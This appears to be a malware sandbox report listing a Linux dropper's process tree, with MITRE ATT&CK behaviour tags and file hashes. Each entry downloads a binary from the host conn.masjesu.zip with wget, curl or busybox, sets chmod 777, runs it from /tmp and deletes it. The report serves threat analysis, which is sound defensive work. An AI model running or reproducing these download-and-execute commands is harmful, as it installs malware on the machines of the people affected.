/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵PID:943
-
-
/bin/chmodchmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵PID:946
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵PID:947
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- System Network Configuration Discovery
PID:950
-
-
/bin/chmodchmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵PID:953
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- System Network Configuration Discovery
PID:954
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- System Network Configuration Discovery
PID:957
-
-
/bin/chmodchmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- Executes dropped EXE
PID:959
-
-
/bin/rmrm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵PID:960
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵PID:961
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- System Network Configuration Discovery
PID:964
-
-
/bin/chmodchmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵PID:967
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵PID:968
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵PID:971
-
-
/bin/chmodchmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- File and Directory Permissions Modification
PID:972
-
-
/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:973
-
-
/bin/rmrm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- System Network Configuration Discovery
PID:974
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- System Network Configuration Discovery
PID:975
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:976
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- System Network Configuration Discovery
PID:978
-
-
/bin/chmodchmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵PID:981
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵PID:982
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:983
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- System Network Configuration Discovery
PID:985
-
-
/bin/chmodchmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- File and Directory Permissions Modification
PID:986
-
-
/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- Executes dropped EXE
PID:987
-
-
/bin/rmrm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵PID:988
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- System Network Configuration Discovery
PID:989
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:990
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- System Network Configuration Discovery
PID:992
-
-
/bin/chmodchmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- File and Directory Permissions Modification
PID:993
-
-
/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- Executes dropped EXE
PID:994
-
-
/bin/rmrm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵PID:995
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- System Network Configuration Discovery
PID:996
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:997
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- System Network Configuration Discovery
PID:999
-
-
/bin/chmodchmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- File and Directory Permissions Modification
PID:1000
-
-
/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- Executes dropped EXE
PID:1001
-
-
/bin/rmrm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵PID:1002
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- System Network Configuration Discovery
PID:1003
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1004
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- System Network Configuration Discovery
PID:1006
-
-
/bin/chmodchmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- File and Directory Permissions Modification
PID:1007
-
-
/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- Executes dropped EXE
PID:1008
-
-
/bin/rmrm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵PID:1009
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97